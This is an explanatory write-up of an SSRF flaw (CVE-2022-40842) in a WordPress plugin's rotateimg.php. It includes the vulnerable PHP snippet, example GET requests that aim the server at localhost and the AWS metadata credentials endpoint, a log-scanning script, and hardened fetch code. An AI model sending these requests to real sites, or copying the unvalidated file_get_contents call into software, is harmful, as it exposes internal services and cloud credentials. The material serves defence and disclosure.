In 2022, a security flaw (CVE-2022-40842) was disclosed in the ndk design NdkAdvancedCustomizationFields 3.5.0 WordPress plugin: a Server-Side Request Forgery (SSRF) bug in rotateimg.php. Anyone who can reach that script can make the web server issue HTTP requests to a destination of their choosing, which can expose internal services, leak data, or lead to further exploitation.

Let's break down how this works, how it can be exploited, and what you should do about it—all in straightforward language.

What Is SSRF?

Server-Side Request Forgery (SSRF) is when an attacker can make your server send HTTP requests to a destination the attacker chooses, including hosts behind your firewall that are not reachable from the internet. Because the request originates from the server itself, it inherits the server's network position and any trust that internal services place in it. SSRF is typically abused to:

- Reach internal admin panels (localhost or internal-only IPs)
- Read cloud metadata endpoints (e.g., http://169.254.169.254/latest/meta-data/)
- Steal sensitive data such as credentials or the responses of internal services

About NdkAdvancedCustomizationFields and The Issue

ndk design NdkAdvancedCustomizationFields is a plugin for extending site customization on WordPress. In version 3.5.0, the rotateimg.php file does not validate the URL it is given before fetching it.

Vulnerable Code Snippet (Simplified)

Inside rotateimg.php, the plugin accepts a parameter such as img_url and fetches whatever it names for image processing. Nothing checks that the URL uses an expected scheme or points to a trusted external host rather than an internal one.

// rotateimg.php (simplified example)
if (isset($_GET['img_url'])) {
    $img_url = $_GET['img_url'];
    $img_data = file_get_contents($img_url); // <== Dangerous!
    // ... process $img_data ...
}


Problem: The code fetches whatever resource img_url names, wherever it points: localhost, internal IPs, the cloud metadata service. Note also that file_get_contents() accepts more than http:// URLs; with the usual PHP configuration it will happily read local paths and other stream wrappers (file://, php://), so the same parameter can become a local file read.

How does an attacker exploit this?

Suppose the website runs NdkAdvancedCustomizationFields 3.5.0 and rotateimg.php is reachable directly from the internet, as plugin files under wp-content/plugins/ usually are. An attacker sends a crafted HTTP GET request:

GET /wp-content/plugins/ndk-advanced-customization-fields/rotateimg.php?img_url=http://127.0.0.1:8080/admin HTTP/1.1
Host: victim.com


- The target server fetches http://127.0.0.1:8080/admin from itself (localhost).
- A service bound only to 127.0.0.1 typically trusts any request that arrives from the local machine, so the attacker may read private information or trigger actions that were never meant to be exposed. Whether the response body is returned to the attacker depends on what rotateimg.php does with the fetched data; even when it is not, response size and timing often leak whether the internal port is open.

Typical internal targets for this kind of request:

- Internal admin panels (localhost or internal-only IPs)
- AWS/GCP metadata endpoints (e.g., http://169.254.169.254/latest/meta-data/)

Example Exploit: Read AWS Metadata

GET /wp-content/plugins/ndk-advanced-customization-fields/rotateimg.php?img_url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ HTTP/1.1
Host: victim.com

On an EC2 instance with IMDSv1 enabled, this request lists the name of the IAM role attached to the instance; a second request with that name appended to the path returns the role's temporary access key, secret key and session token. If IMDSv2 is enforced, the request fails, because IMDSv2 requires a session token obtained with an HTTP PUT, which a GET-only SSRF like this one cannot perform. On GCP the metadata server additionally requires a Metadata-Flavor: Google request header, which this bug gives the attacker no way to set.

Steal sensitive data

Whatever the attacker retrieves this way (cloud credentials, internal admin pages, local files) can escalate into privilege escalation, a data breach, or total server compromise.
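If you want to know whether anyone has already tried this against your site, the web server access log is the place to look. The script below is an added example, not part of the advisory or the plugin: it scans combined-format (Apache/Nginx style) access log lines for rotateimg.php requests whose img_url points at a loopback, link-local or private address, a known internal hostname, or a non-HTTP scheme. The log lines embedded in it are constructed for the example, and the hostname list in classify_img_url is a minimal starting point rather than a complete one.

```php
<?php
// Added example (not from the plugin or the advisory): find rotateimg.php
// requests whose img_url targets something an SSRF attacker would want.
// The five log lines below are constructed for this example.

$sample_log = <<<'LOG'
203.0.113.10 - - [22/Nov/2022:01:15:03 +0000] "GET /wp-content/plugins/ndk-advanced-customization-fields/rotateimg.php?img_url=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F HTTP/1.1" 200 512
203.0.113.10 - - [22/Nov/2022:01:15:09 +0000] "GET /wp-content/plugins/ndk-advanced-customization-fields/rotateimg.php?img_url=http://127.0.0.1:8080/admin HTTP/1.1" 200 8812
198.51.100.7 - - [22/Nov/2022:01:16:30 +0000] "GET /wp-content/plugins/ndk-advanced-customization-fields/rotateimg.php?img_url=https://cdn.example.org/logo.png HTTP/1.1" 200 14022
198.51.100.7 - - [22/Nov/2022:01:17:02 +0000] "GET /index.php HTTP/1.1" 200 3311
203.0.113.10 - - [22/Nov/2022:01:18:44 +0000] "GET /wp-content/plugins/ndk-advanced-customization-fields/rotateimg.php?img_url=file:///etc/passwd HTTP/1.1" 200 1903
LOG;

// Returns a short reason when the fetched URL looks like an SSRF attempt, or
// null for an ordinary external image URL. Hostnames are judged by name only
// (no DNS lookups), so this runs offline against archived logs.
function classify_img_url(string $url): ?string
{
    $p = parse_url($url);
    if ($p === false) {
        return 'unparseable URL';
    }
    $scheme = strtolower($p['scheme'] ?? '');
    if (!in_array($scheme, ['http', 'https'], true)) {
        return "non-http scheme ($scheme)";           // file://, php://, gopher://, ...
    }
    $host = strtolower(trim($p['host'] ?? '', '[]'));  // parse_url keeps IPv6 brackets
    if ($host === 'localhost' || substr($host, -10) === '.localhost'
        || $host === 'metadata.google.internal') {
        return "internal hostname ($host)";
    }
    if (filter_var($host, FILTER_VALIDATE_IP) !== false
        && filter_var($host, FILTER_VALIDATE_IP,
               FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false) {
        return "internal address ($host)";            // 127/8, 169.254/16, 10/8, ::1, ...
    }
    return null;
}

// Parses combined-format access log lines and returns one record per
// suspicious rotateimg.php request.
function scan_access_log(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S*\/rotateimg\.php\?\S*)/', $line, $m)) {
            continue;
        }
        parse_str((string) parse_url($m[3], PHP_URL_QUERY), $q);  // parse_str also URL-decodes
        if (!isset($q['img_url'])) {
            continue;
        }
        $reason = classify_img_url($q['img_url']);
        if ($reason !== null) {
            $hits[] = ['src' => $m[1], 'time' => $m[2], 'img_url' => $q['img_url'], 'reason' => $reason];
        }
    }
    return $hits;
}

// With the constructed log above, this reports the metadata request, the
// 127.0.0.1:8080 request and the file:// request; the CDN fetch is left alone.
foreach (scan_access_log($sample_log) as $h) {
    printf("%s  %-14s %-50s %s\n", $h['time'], $h['src'], $h['img_url'], $h['reason']);
}
```

Run it with `php scan.php` against a saved copy of the log. A hit from the same source address against several internal targets in a short window is the pattern to expect from a scanner; a single hit from a legitimate-looking client still deserves a look, because the vulnerable script will fetch whatever it is given.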

References

- Official CVE Entry: CVE-2022-40842
- Original Advisory: Exploit Database EDB-ID 50768
- WordPress Plugin Page

How To Fix It

If you use this plugin:
- Update: check with the vendor for a patched release. If none is available, disable or remove the plugin.
- Until then, block direct requests to rotateimg.php at the web server or WAF, and treat any img_url in your access logs that points at localhost, a private IP range or 169.254.169.254 as an attack attempt.

Example Mitigation

// Allowed hosts only: strict comparison, and only http/https URLs.
$allowed_hosts = ['trusted.com'];
$img_url = $_GET['img_url'] ?? '';
$parsed_url = parse_url($img_url);
if ($parsed_url === false
    || !in_array($parsed_url['scheme'] ?? '', ['http', 'https'], true)
    || !in_array($parsed_url['host'] ?? '', $allowed_hosts, true)) {
    die('Invalid image source.');
}
$img_data = file_get_contents($img_url);

This is the minimum, and two gaps remain. file_get_contents() follows HTTP redirects, so an allowlisted host that answers with a 302 to http://169.254.169.254/ still reaches the metadata service. And the allowlist checks a name, not an address: if that name resolves to an internal IP (a stale record, or a host under attacker control) the request goes internal anyway. Closing both means checking the resolved address, pinning it for the request, and refusing redirects.
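A fuller version of that check, written here as an added example rather than code from the plugin or its vendor: it keeps the allowlist and adds a scheme restriction, a check of every address the host resolves to, pinning of that address for the request (via CURLOPT_RESOLVE, so a changed DNS answer between check and fetch cannot redirect it), no redirect following, a size cap, and a check that what came back is actually an image. The names in ALLOWED_IMAGE_HOSTS and the 2 MB limit are placeholder values to adjust for your site.

```php
<?php
// Added example (not the plugin's code): a hardened replacement for the
// file_get_contents($img_url) call in rotateimg.php. The allowlist entries
// and the 2 MB limit are hypothetical values to adapt for your site.

const ALLOWED_IMAGE_HOSTS = ['trusted.com', 'cdn.trusted.com'];  // hypothetical
const MAX_IMAGE_BYTES     = 2 * 1024 * 1024;

// Reject loopback, link-local (169.254.0.0/16 covers the cloud metadata
// service), private and reserved ranges for both IPv4 and IPv6.
function is_public_ip(string $ip): bool
{
    return filter_var($ip, FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}

// Resolve a hostname to every A/AAAA answer; an IP literal resolves to itself.
function resolve_all(string $host): array
{
    $host = trim($host, '[]');                       // parse_url keeps IPv6 brackets
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return [$host];
    }
    $ips = [];
    foreach ((array) @dns_get_record($host, DNS_A) as $r) {
        if (isset($r['ip'])) { $ips[] = $r['ip']; }
    }
    foreach ((array) @dns_get_record($host, DNS_AAAA) as $r) {
        if (isset($r['ipv6'])) { $ips[] = $r['ipv6']; }
    }
    return $ips;
}

// Returns the image bytes, or null if anything about the URL or the
// response is unacceptable. Every failure path is fail-closed.
function fetch_image_safely(string $url): ?string
{
    $p = parse_url($url);
    if ($p === false || empty($p['host']) || isset($p['user']) || isset($p['pass'])) {
        return null;                                 // no userinfo tricks like http://trusted.com@evil/
    }
    $scheme = strtolower($p['scheme'] ?? '');
    if (!in_array($scheme, ['http', 'https'], true)) {
        return null;                                 // no file://, php://, gopher://, ...
    }
    $host = strtolower($p['host']);
    if (!in_array($host, ALLOWED_IMAGE_HOSTS, true)) {
        return null;
    }
    $port = $p['port'] ?? ($scheme === 'https' ? 443 : 80);

    // Check the address the request will actually go to, then pin it so a
    // DNS answer cannot change between this check and the fetch (rebinding).
    $ips = resolve_all($host);
    if ($ips === [] || count(array_filter($ips, 'is_public_ip')) !== count($ips)) {
        return null;
    }
    $addr = strpos($ips[0], ':') !== false ? '[' . $ips[0] . ']' : $ips[0];
    $pin  = $host . ':' . $port . ':' . $addr;

    $body = '';
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RESOLVE        => [$pin],
        CURLOPT_FOLLOWLOCATION => false,             // a 302 to 169.254.169.254 would bypass the allowlist
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_CONNECTTIMEOUT => 3,
        CURLOPT_TIMEOUT        => 10,
        CURLOPT_WRITEFUNCTION  => function ($ch, string $chunk) use (&$body): int {
            $body .= $chunk;
            // Returning fewer bytes than given makes curl abort the transfer.
            return strlen($body) > MAX_IMAGE_BYTES ? 0 : strlen($chunk);
        },
    ]);
    $ok   = curl_exec($ch);
    $code = curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    $type = (string) curl_getinfo($ch, CURLINFO_CONTENT_TYPE);
    curl_close($ch);

    if ($ok === false || $code !== 200 || strlen($body) > MAX_IMAGE_BYTES
        || strncmp($type, 'image/', 6) !== 0 || @getimagesizefromstring($body) === false) {
        return null;
    }
    return $body;
}

// Usage inside rotateimg.php:
// $img_data = fetch_image_safely($_GET['img_url'] ?? '');
// if ($img_data === null) { http_response_code(400); exit('Invalid image source.'); }
```

Two design notes. The hostname allowlist and the resolved-address check are deliberately both present: the allowlist limits what the feature can be used for, the address check is what actually stops internal access, and pinning with CURLOPT_RESOLVE is what makes the address check hold at request time rather than only at check time. The size cap and the getimagesizefromstring() check are there because rotateimg.php exists to process images; a response that is not an image has no business reaching the image-processing code, and a multi-gigabyte one has no business reaching memory.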

Conclusion

CVE-2022-40842 is a strong reminder of the risks of insecure input handling, especially with URLs that the server goes on to fetch. If you're running ndk design NdkAdvancedCustomizationFields 3.5.0, act now to secure your site.

Stay alert—patch fast and review third-party add-ons regularly.

*For further details, view the links above or reach out to WordPress security communities. Always report unusual activity to your hosting provider or your security team!*

Timeline

Published on: 11/22/2022 01:15:00 UTC
Last modified on: 11/23/2022 16:04:00 UTC